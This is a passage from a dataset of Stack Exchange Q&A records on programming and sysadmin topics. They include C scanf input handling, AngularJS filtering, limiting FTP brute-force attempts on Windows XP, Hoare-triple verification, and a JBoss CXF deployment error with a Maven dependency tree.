The fact that Wikipedia has [an entire category for XML](https:\/\/en.wikipedia.org\/wiki\/Category:XML) should give you an idea of how bloated the format and standard has become.\nComment: Will do! The critique about it being considered bloated, I was already aware of. And even though I kind of agree, for my intended application it appears to be more fitting than, for instance, a relational database. Anyway, I'll have to investigate eXistDB, or other XML backends as well, to see what they have to say\/to offer in terms of mitigating security risks. In any case, thanks again for your valuable insights!\n","meta":{"source":"security.stackexchange","title":"Single Page Application with REST API backend based on XML, queried by dynamic XPath","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting\/Visualization in Workbench?\n\nQuestion: I would like to ask a question with Mathematica Workbench.\nThe workbench is based on Eclipse. Of course, it would have no problem to add breakpoints and debug, but I wonder if it is possible to provide the advanced plotting\/visualization as in a Mathematica notebook?\nI remember once reading in the Mathematica documentation which said a significant portion of code needs to be rewritten for each platform (Windows, Linux, OS X) for the graphics frontend (i.e., to implement interactive notebooks), and I suspect that it will never be possible to have such support in Eclipse.\nSo what is the typical workflow when using Workbench? Perhaps it was never intended to provide the level of visualization as a Mathematica notebook, and WRI actually wishes users to \n\nDebug\/test individual modules in a Mathematica notebook, and then\nwrap it, exposing certain functions\/interfaces like the standard\nsoftware engineering procedure. \nWorkbench is intended to be organize projects, like Wolfram Alpha, containing dozens or more such complex modules.\nAnswer: I do not know where you got the idea that interactive notebooks are platform-specific. This simply isn't true. \nThe way the Workbench projects work is that you develop packages (<code>.m<\/code> files) in the Eclipse editor, but you can include notebooks (<code>.nb<\/code> files) in the project for testing, visualisation, interactive use of the front end or whatever. \nSo if you want plotting, visualisation or interactive features such as the <code>Manipulate<\/code> function, you need a notebook file, but you can include these files in a Workbench project and launch the Mathematica front end from the Eclipse-based interface. \nComment: Sorry for not being clear enough. I meant that the screen graphics rendering part of MMA needs is platform specific which I read in the help; this might already obsolete because the front end is possible to be written in Java, but I am unsure whether it is the case due to performance concerns. This is not the actual question :) @Verbeia\nComment: So if I want to use like `manipulate` `plot` do you mean that I can simply add such lines in **.nb** file, include in a Workbench project, and when running to the `manipulate` `plot` lines the Workbench will call MMA to display the graph? @Verbeia @m_goldberg\nComment: No, I mean tht you can launch the notebook from the Eclipse \/ Workbench project, which launches the Mathematica front end, and you can run the `Manipulate` (Note - case-sensitive!!) from there, possibly calling functions you have written in the `.m` file. 
The front end is provided; it is called Mathematica.\n","meta":{"source":"mathematica.stackexchange","title":"Plotting\/Visualization in Workbench?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Use GPU profiler (for example CodeXL) together with PyOpenCL\n\nQuestion: I have my complex PyOpenCL app with a lot of buffers creations, kernel templating and etc. I want to profile my app on GPU to see what is the bottle neck in my case.\nIs it possible to use some gpu profiler with PyOpenCl app? For example CodeXL.\nP.S. I know about event profiling but it isn't enough.\nAnswer: Yes, it is possible. Look here: http:\/\/devgurus.amd.com\/message\/1282742\n","meta":{"source":"stackoverflow","title":"Use GPU profiler (for example CodeXL) together with PyOpenCL","dup_signals":{}},"subset":"stackexchange"} +{"text":"C application skips my scanf calls\n\nQuestion: I'm trying to write code to count how many times a string repeats inside another one. (If there is some easier approach, please let me know.)\nHere is the code that I have now:\n<code>int getStringLenght (char str[]) {\n int lenghtOfTheString;\n int i;\n for (i = 0; i < 100; i++) {\n if(str[i] == '\\0') {\n lenghtOfTheString = i;\n break;\n }\n }\n return lenghtOfTheString;\n}\nint main()\n{\n printf(\"Type a string: \");\n char T[1024];\n scanf(\"%s\",&T);\n char P[100];\n printf(\"Type a substring: \");\n scanf(\"%s\",&P);\n printf(\"%s\",P);\n int stringSize = getStringLenght (P);\n int occurences = 0;\n int i;\n for (i = 0; i < 10; i++) {\n int j;\n\n if(T[i] == P[0]) {\n for (j = 0;j<10;j++) {\n char c1 = T[i+j];\n char c2 = P[j];\n if(c1 != c2) {\n\n break;\n }\n if(j == stringSize-1) {\n occurences++;\n \/\/printf(\"string iguais em i = %d\",i);\n }\n }\n }\n }\n printf(\"\\nThe substring %s was found %d times\", P, occurences);\n\n return 0;\n}\n<\/code>\nThe app compiles. When I type \"banana\", for example, on the first <code>scanf<\/code>, and then \"na\" on the second, the app comes out with the right answer. But, if I type \"banana and milk\" on the first <code>scanf<\/code>, it automatically interprets the second <code>scanf<\/code> as \"and\", even when I don't type anything but \"banana and milk ENTER\"\nWhat's happening?\nComment: Try `sscanf` instead of `scanf` in your code.\nAnswer: <code>scanf<\/code>'s \"%s\" conversion only reads characters until it encounters white-space (e.g., space, new-line, or tab). When you enter more than one word, it reads the first. The second call reads the second, and so on.\nIf you want to read an entire line, you usually want to use <code>fgets<\/code> instead (<code>scanf<\/code> can do the job as well, but it's a little trickier, and uses a feature of which many are unaware, so they often find it difficult to understand).\nComment: Wait, scanf can be made to not stop on whitespace? Pray tell!\nComment: @RichardJ.RossIII: Yes. `char your_string[256]; scanf(\"%255[^\\n]%c\", your_string, &some_char);` Note that (to avoid being essentially identical to `gets`) you need to supply the size. Also note that the size you supply needs to be one less than the size of the array. As I've done it here, the `some_char` will normally hold a new-line, but the line was longer than you allowed for, it'll be the next character.\nComment: fgets does work, but now my string contains a newline inside it. is there some way to remove it?\nComment: @Lucas: Several. One easy (but unconventional) one is: `strtok(your_string, \"\\n\");`. 
A bit more work, but more conventional, is `char *pos = strchr(string, '\\n'); if (pos!=NULL) *pos = '\\0';`\nAnswer: You don't understand how scanf works. http:\/\/www.cplusplus.com\/reference\/clibrary\/cstdio\/scanf\/ <code>%s<\/code> will only read one string, terminated by white space. If you want to keep reading strings, or read a line, you have to keep using scanf until one of your strings ends in a new line or EOF, or use another function, like <code>fgets<\/code>.\nComment: `cplusplus.com` can't seem to get anything quite right (in this case, their description doesn't even mention scanset conversions).\nAnswer: You have to remember that many functions are already implemented. This is why your <code>getStringLength<\/code> (you have typo in it's name) is needless. You can simply check the string's length using <code>strlen<\/code> function from <code>string.h<\/code>. What is more when you import this file you also have access to <code>strstr<\/code> function which finds the first occurrence of a given substring in a string. Try to use them instead of reinventing the wheel ;) \nComment: All good advice, but should probably be a comment, as it does nothing to (even try to) answer the question.\nAnswer: That is a standart problem with <code>scanf<\/code>. There are 3 ways to fix this:\n\n1: Call fflush after each scanf:\n<code>scanf(\"%s\", some_string); \/\/ you don't need to write &some_string because giving a array to a function automatically converts it to a pointer\nfflush(stdin);\n<\/code>\n<code>fflush()<\/code> isn't available on every system.\n\n2: Putting scanf in a loop:\n<code>do\n scanf(\"%s\", somestring);\nwhile (getchar() != '\\n');\n<\/code>\n\n3: Don't use scanf! Use fgets and sscanf!\n<code>char buffer[100]; \/\/ buffer for fgets()\nfgets(buffer, 100, stdin); \/\/ read a line from stdin (standart input) into buffer\nsscanf(buffer, \"%s\", some_string); \/\/ convert buffer in any format you want\n<\/code>\n","meta":{"source":"stackoverflow","title":"C application skips my scanf calls","dup_signals":{}},"subset":"stackexchange"} +{"text":"AngularJS filter list case insensitive\n\nQuestion: I have a list of subjects and i want to search through my list and return valid results but it is case senstive and doesnt return the correct results \n<code>var subjects = [\n {id: '1', name: 'Maths'}, \n {id: '2', name: 'English'},\n {id: '3', name: 'Physics'}\n]; \n\nvar returnValue = { items: [] };\nsubjects.forEach(function(item){\n\n if (item.name.indexOf(query) > -1 ){\n returnValue.items.push(item);\n }\n else if (item.id.indexOf(query) > -1 ){\n returnValue.items.push(item);\n }\n});\nconsole.log(returnValue)\n<\/code>\nSo for example if i enter the text 'm', when it searches the list of subjects it should return Maths but right now it returns nil but if i input 'M', then it returns the subject Maths. \nAny help on solving this? Much appreciated. 
\nAnswer: You can always convert the comparison values to lowercase and then compare.\n<code>ar subjects = [\n {id: '1', name: 'Maths'}, \n {id: '2', name: 'English'},\n {id: '3', name: 'Physics'}\n]; \n\nvar returnValue = { items: [] };\nsubjects.forEach(function(item){\n\n var itemNameLower = item.name.toLowerCase();\n var queryLower = query.toLowerCase();\n\n if (itemNameLower.indexOf(queryLower) > -1 ){\n returnValue.items.push(item);\n }\n else if (item.id.indexOf(queryLower) > -1 ){\n returnValue.items.push(item);\n }\n});\nconsole.log(returnValue)\n<\/code>\nComment: probably using a filter `item in items | filter : searchText : false`\nComment: that would have been my answer\nComment: @avijit thnks but i would prefer case insensitive rather than doing this\nComment: @Gianmarco is there no other way to handle this, angularjs style?\nComment: @KingsleySimon You may be looking for something like this: http:\/\/stackoverflow.com\/questions\/18082017\/angularjs-filter-case-insensitive\nComment: @Gianmarco The default value is already `false`, it need not be set explicitly. `ng-repeat=\"item in items | filter : searchText\"` should also work in an insensitive manner.\nComment: just give it a shot and verify ;)\nComment: @AvijitGupta i cant use filter due to the plugin tht i am using to execute this.\n","meta":{"source":"stackoverflow","title":"AngularJS filter list case insensitive","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I restrict users' connection attempts to my FTP server?\n\nQuestion: Is there any way possible to restrict user to make a connection to the FTP server on my Windows XP computer? \nI have an FTP server established in Windows XP and now I want to make access to that FTP server restricted to deny brute force attacks. \nIf the machine was Linux then I would use an iptables chain to restrict users' connection attempts, for example to deny user after 6 connection attempts in one second. \nSo can I do this in Windows?\nComment: There is the Windows firewall or the FTP server allowed\/denied IP addresses. Also FTP under Windows uses NTFS permissions, are you using FAT or NTFS for your file system?\nComment: I want windows firewall and I am using NTFS as file system.\nComment: Updated to make the question more readable, and to use appropriate tags. Please have a look to check I kept the meaning you intended.\nComment: While I am not sure about Windows Firewall on Windows XP, I do know that Windows 10 firewall allows you to create a block all except rule for either your outbound or inbound traffic.\n\nI am not sure about FTP being a specific protocol on the list, but you can make an ANY protocol; ANY IP; rule and white-list the IPs of your clients.\n\nSide Note: Win XP is EOL. If you are hosting an FTP server, I highly recommend that you go ahead and upgrade your OS either to some Linux distro or take the free win 10 upgrade.\nAnswer: Have you thought about just using the windows firewall API? Should give you more than enough control based on what you are trying to do.\nComment: But how can I do that ?\nAnswer: Windows XP's firewall does not do the connection-limiting that you are asking for. \nTo limit the number of connections, you would have to use a different firewall that had that feature, or look to see if the FTP server you are using had a similar feature. 
\nFree Windows FTP Server: FileZilla\nTo limit incoming connections in FileZilla: File -> Site Manager -> Transfer Settings -> Limit number of simutaeous connections\nComment: Can you give me some of the tools ?\nAnswer: First of all you have to keep in mind that Windows XP's built-in firewall doesn't have the capability to apply the rules you described. Plus, even if it did, packets would still get dropped by the same machine that's handling the actual FTP connections, so it would still be recommendable to put a separate firewall (or Linux box) in front of it, just for firewall\/NAT purposes.\nOn top of that, using Windows XP's built-in FTP server is also not a good idea, as it's too integrated with the OS and it would force you to create OS user profiles and manage ACLs through NTFS permissions. Therefore I would opt for a different type of server, with FileZilla Server and Syncplify.me Server! being two of such options.\nFileZilla Server is free for any use, and allows you to limit the number of simultaneous connections. Syncplify.me Server! is free for personal use, but the paid editions allow you to limit not only the number of simultaneous connections but also how many of them are allowed from the same IP address, and how many \"attempts\" are allowed in how much time (window) before automatic temprary\/permanent blacklisting.\n(Disclaimer: I am the author of Syncplify.me Server)\n","meta":{"source":"security.stackexchange","title":"How can I restrict users' connection attempts to my FTP server?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to verify that function with Hoare Triple?\n\nQuestion: As the title says, how can I verify the function below with the Hoare Triple? I read various lectures about it but I can't figure out how to do it.\n<code>int uguaglianza_insiemi(elem_lista_t *insieme_A,\n elem_lista_t *insieme_B)\n{\n int esito; \n\n if ((insieme_A == NULL) && \n (insieme_B == NULL))\n esito = 1;\n\n else if (insieme_A == NULL ||\n insieme_B == NULL)\n esito = 0;\n\n else if (insieme_A->valore != insieme_B->valore) \n esito = 0;\n\n else esito = uguaglianza_insiemi(insieme_A->succ_p,\n insieme_B->succ_p);\n\n return (esito);\n}\n<\/code>\nComment: You need to write the preconditions P and the postconditions Q and prove that if the precponditions are met, the postcondition will hold after the processing. For example, a precondition is that `insiema_A` and B are either null or point to a valid list element.\nComment: So i need to write and set a Preconditions and a Postconditions? In my lecture i read that if the function is recursive, i can also resolve it with the induction metod, i'm a bit confused\nComment: Induction probably means here that if the first invocation was correct, and the program (function) is correct, then every next invocation will be correct. But you still need to write those pre- and post conditions.\nComment: You can write statements or `assert()`s to verify the pre- and post conditions. The only thing the function can't verify is that on first invocation it has been called with pointers, if non-null, to objects that are valid list elements. 
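As a minimal sketch of that idea (the uguaglianza_insiemi_checked wrapper below is made up for illustration, and it assumes the elem_lista_t and uguaglianza_insiemi declarations from the question are in scope), the runtime-checkable part of the contract can be wrapped around the call with assert(); the precondition that every non-null pointer refers to a valid, well-formed list stays a documented assumption, because C cannot test it:\n<code>#include <assert.h>\n\n\/* Sketch only (hypothetical wrapper): checks the part of the contract that is\n testable at run time. *\/\nint uguaglianza_insiemi_checked(elem_lista_t *insieme_A,\n elem_lista_t *insieme_B)\n{\n int esito = uguaglianza_insiemi(insieme_A, insieme_B);\n\n \/* Postcondition: the result is a boolean flag. *\/\n assert(esito == 0 || esito == 1);\n\n \/* Postcondition: two empty sets are always reported as equal. *\/\n if (insieme_A == NULL && insieme_B == NULL)\n assert(esito == 1);\n\n return esito;\n}\n<\/code>\nIn Hoare-triple terms this only exercises {Q}; {P} still has to be argued on paper or enforced by the caller.\n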
C allows with casts to invoke the function with garbage pointers.\nComment: Ok thank you for the tip, i only need to understand how to write those conditions, for instance, if i take this precondition you wrote:\"insieme_A and B are either null or point to a valid list element.\" , i must write the post condition related to that pre condition?\nComment: You can write the pre and post conditions either as natural language, or using some formal language, or using C statements.\nComment: I would ask you if you can introduce some examples about my code! Might you do that?\nAnswer: To prevent a long discussion in comments, I'll try to write some pre- and post conditions.\nAs it is not possible to test inside the function whether it is called with pointers to valid list objects, that falls to the parent\/the caller:\n<code>\/\/ The following function must be called with pointers that are either null\n\/\/ or point to valid list elements. The lists must be correct (no malloc bugs etc).\n\/\/ The compiler must have checked that it is called with pointers to the proper types,\n\/\/ as C has no typeof operator.\n\/\/\nint uguaglianza_insiemi(elem_lista_t *insieme_A,\n elem_lista_t *insieme_B)\n{\n int esito; \n\n if ((insieme_A == NULL) && \n (insieme_B == NULL))\n esito = 1; \/\/ both pointers are null: equal\n\n \/\/ not both pointes are null\n else if (insieme_A == NULL ||\n insieme_B == NULL)\n esito = 0; \/\/ not both pointers are null, but one is: not equal\n\n \/\/ neither pointer is null and so they may be dereferenced\n else if (insieme_A->valore != insieme_B->valore) \n esito = 0; \/\/ neither pointer is null, but their element values aer not equal: not equal\n\n \/\/ the function can be called recursively now because its precondition has been met,\n \/\/ that both successor pointers are null or point to valid list elements (induction).\n else esito = uguaglianza_insiemi(insieme_A->succ_p,\n insieme_B->succ_p);\n \/\/ the post condition is that esito reflects equality of both (partial) lists \n return (esito);\n}\n<\/code>\nI hope this is something that you and you professor can work with.\n\n{P}: The function must be called with pointers that are either null or point to valid list elements.\nC: <code>uguaglianza_insiemi( *A, *B)<\/code>\n{Q}: function result reflects equality of the lists\n\nInside the function, this continues with the <code>if<\/code> statement using the rule of composition.\nComment: @Porchetta17 if yu consider the answer useful you should accept it, cf to https:\/\/stackoverflow.com\/help\/someone-answers\n","meta":{"source":"stackoverflow","title":"How to verify that function with Hoare Triple?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error deploying CXF web service on JBoss\n\nQuestion: I created a CXF web service that runs smoothly on tomcat. 
When I tried to deploy it on JBoss 5.1 I got the following error:\n<code>10:29:20,476 INFO [LogNotificationListener] Adding notification listener for logging mbean \"jboss.system:service=Logging,type=Log4jService\" to server org.jboss.mx.server.MBeanServerImpl@724a2dd4[ defaultDomain='jboss' ]\n10:29:25,854 ERROR [ProfileDeployAction] Failed to add deployment: [proprietary-jar-1]-1.3.jar\norg.jboss.deployers.spi.DeploymentException: Unable to find class path entry ClassPathEntryImpl{path=[war-name]\/WEB-INF\/lib\/spring-security-core-3.0.7.RELEASE.jar} from [proprietary-jar-1]-1.3.jar\n at org.jboss.deployers.spi.DeploymentException.rethrowAsDeploymentException(DeploymentException.java:49)\n at org.jboss.deployers.vfs.plugins.structure.VFSStructureBuilder.applyContextInfo(VFSStructureBuilder.java:188)\n at org.jboss.deployers.structure.spi.helpers.AbstractStructureBuilder.populateContext(AbstractStructureBuilder.java:82)\n<\/code>\nBoth jars are inside the deployed [WAR-FILE]\/WEB-INF\/lib.\nI've read a bunch or articles on class loading isolation levels, cxf and web-service integration on JBOSS (how to turn off web services stack), but nothing seems to solve this..\nhere goes the war project dependency tree:\n<code>[INFO] --- maven-dependency-plugin:2.8:tree (default-cli) @ application ---\n[INFO] [war project]:3.8.1-SNAPSHOT\n[INFO] +- [proprietary-jar-2]:compile\n[INFO] | +- commons-dbcp:commons-dbcp:jar:1.2.1:compile\n[INFO] | | +- commons-collections:commons-collections:jar:3.2.1:compile (version managed from 2.1)\n[INFO] | | +- commons-pool:commons-pool:jar:1.3:compile (version managed from 1.2)\n[INFO] | | +- xml-apis:xml-apis:jar:1.0.b2:compile\n[INFO] | | \\- xerces:xercesImpl:jar:2.4.0:compile (version managed from 2.0.2)\n[INFO] | +- commons-httpclient:commons-httpclient:jar:3.1:compile\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | \\- commons-codec:commons-codec:jar:1.8:compile (version managed from 1.2)\n[INFO] | +- commons-io:commons-io:jar:1.4:compile\n[INFO] | +- commons-lang:commons-lang:jar:2.3:compile\n[INFO] | +- log4j:log4j:jar:1.2.14:compile\n[INFO] | +- [proprietary-jar-3]:2.4.0:compile\n[INFO] | +- [proprietary-jar-4]:compile\n[INFO] | | +- ([proprietary-jar-5]:1.4.0:compile - omitted for duplicate)\n[INFO] | | +- org.springframework:spring-jdbc:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | \\- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | +- org.hibernate:hibernate:jar:3.2.3.ga:compile\n[INFO] | | | +- net.sf.ehcache:ehcache:jar:1.2.3:compile\n[INFO] | | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.4; omitted for duplicate)\n[INFO] | | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1; omitted for duplicate)\n[INFO] | | | +- javax.transaction:jta:jar:1.0.1B:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.4; omitted for duplicate)\n[INFO] | | | +- asm:asm-attrs:jar:1.5.3:compile\n[INFO] | | | +- dom4j:dom4j:jar:1.6.1:compile\n[INFO] | | | +- antlr:antlr:jar:2.7.6:compile\n[INFO] | | | +- 
cglib:cglib:jar:2.1_3:compile\n[INFO] | | | | \\- (asm:asm:jar:1.5.3:compile - omitted for duplicate)\n[INFO] | | | +- (asm:asm:jar:1.5.3:compile - omitted for conflict with 3.3.1)\n[INFO] | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1.1; omitted for duplicate)\n[INFO] | | +- (hsqldb:hsqldb:jar:184.108.40.206:compile - omitted for duplicate)\n[INFO] | | +- javax.xml.bind:jaxb-api:jar:2.1:compile\n[INFO] | | | +- javax.xml.stream:stax-api:jar:1.0-2:compile\n[INFO] | | | \\- javax.activation:activation:jar:1.1:compile\n[INFO] | | +- org.springframework:spring-aop:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (aopalliance:aopalliance:jar:1.0:compile - omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-asm:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-orm:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- commons-beanutils:commons-beanutils:jar:1.7.0:compile\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.3; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - omitted for duplicate)\n[INFO] | | +- org.slf4j:slf4j-api:jar:1.5.6:compile\n[INFO] | | +- org.slf4j:slf4j-log4j12:jar:1.5.6:compile\n[INFO] | | | +- (org.slf4j:slf4j-api:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | | \\- (log4j:log4j:jar:1.2.14:compile - omitted for duplicate)\n[INFO] | | \\- (log4j:log4j:jar:1.2.14:compile - omitted for duplicate)\n[INFO] | +- com.thoughtworks.xstream:xstream:jar:1.2.2:compile\n[INFO] | | \\- xpp3:xpp3_min:jar:22.214.171.124.O:compile\n[INFO] | +- org.springframework.security:spring-security-web:jar:3.0.7.RELEASE:compile\n[INFO] | | +- org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (org.springframework:spring-expression:jar:3.0.6.RELEASE:compile - omitted for conflict with 3.0.7.RELEASE)\n[INFO] | | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - omitted for duplicate)\n[INFO] | | | \\- (org.aspectj:aspectjweaver:jar:1.6.8:compile - version managed from 1.6.2; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-web:jar:3.0.7.RELEASE:compile - version managed from 2.5.4; omitted for duplicate)\n[INFO] | +- 
org.springframework:spring-test:jar:3.0.7.RELEASE:compile\n[INFO] | +- struts:struts:jar:1.1:compile\n[INFO] | +- [proprietary-jar-6]:jar:1.0.2:compile\n[INFO] | +- hsqldb:hsqldb:jar:188.8.131.52:compile\n[INFO] | +- net.sf.json-lib:json-lib:jar:jdk15:2.4:compile\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1.1; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.3; omitted for duplicate)\n[INFO] | | \\- net.sf.ezmorph:ezmorph:jar:1.0.6:compile\n[INFO] | | \\- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | +- org.owasp.esapi:esapi:jar:2.0.1:compile\n[INFO] | | +- commons-configuration:commons-configuration:jar:1.5:compile\n[INFO] | | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 3.2; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.1; omitted for duplicate)\n[INFO] | | | +- (commons-digester:commons-digester:jar:1.8.1:compile - version managed from 1.8; omitted for duplicate)\n[INFO] | | | \\- (commons-beanutils:commons-beanutils-core:jar:1.7.0:compile - omitted for duplicate)\n[INFO] | | +- commons-beanutils:commons-beanutils-core:jar:1.7.0:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.0; omitted for duplicate)\n[INFO] | | +- (commons-fileupload:commons-fileupload:jar:1.2.2:compile - version managed from 1.2; omitted for duplicate)\n[INFO] | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 3.2; omitted for duplicate)\n[INFO] | | +- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | | +- org.beanshell:bsh-core:jar:2.0b4:compile\n[INFO] | | \\- org.owasp.antisamy:antisamy:jar:1.4.3:compile\n[INFO] | | +- org.apache.xmlgraphics:batik-css:jar:1.7:compile\n[INFO] | | | +- org.apache.xmlgraphics:batik-ext:jar:1.7:compile\n[INFO] | | | \\- org.apache.xmlgraphics:batik-util:jar:1.7:compile\n[INFO] | | +- net.sourceforge.nekohtml:nekohtml:jar:1.9.12:compile\n[INFO] | | \\- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | \\- org.owasp:csrfguard:jar:3.0.0:compile\n[INFO] +- [proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- [proprietary-jar-8]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | | +- ([proprietary-jar-4]:compile - omitted for duplicate)\n[INFO] | | +- ([proprietary-jar-3]:2.4.0:compile - omitted for duplicate)\n[INFO] | | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | | \\- ([proprietary-jar-6]:jar:1.0.2:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-9]:jar:2.4.0:compile\n[INFO] | +- [proprietary-jar-10]:jar:2.4.0:compile\n[INFO] | +- [proprietary-jar-11]:jar:188.8.131.52:compile\n[INFO] | +- 
([proprietary-jar-6]:jar:1.0.2:compile - omitted for duplicate)\n[INFO] | \\- org.springframework:spring-web:jar:3.0.7.RELEASE:compile\n[INFO] | +- aopalliance:aopalliance:jar:1.0:compile\n[INFO] | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] +- [proprietary-jar-12]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- de.vdb:IBANConverter:jar:1.1.3:compile\n[INFO] | +- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-16]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | | +- org.aspectj:aspectjrt:jar:1.6.8:compile\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- commons-cli:commons-cli:jar:1.2:compile\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-rt:jar:1.0.3:compile\n[INFO] | | | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-check-ct:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-check-rt:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-concurrent:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | \\- 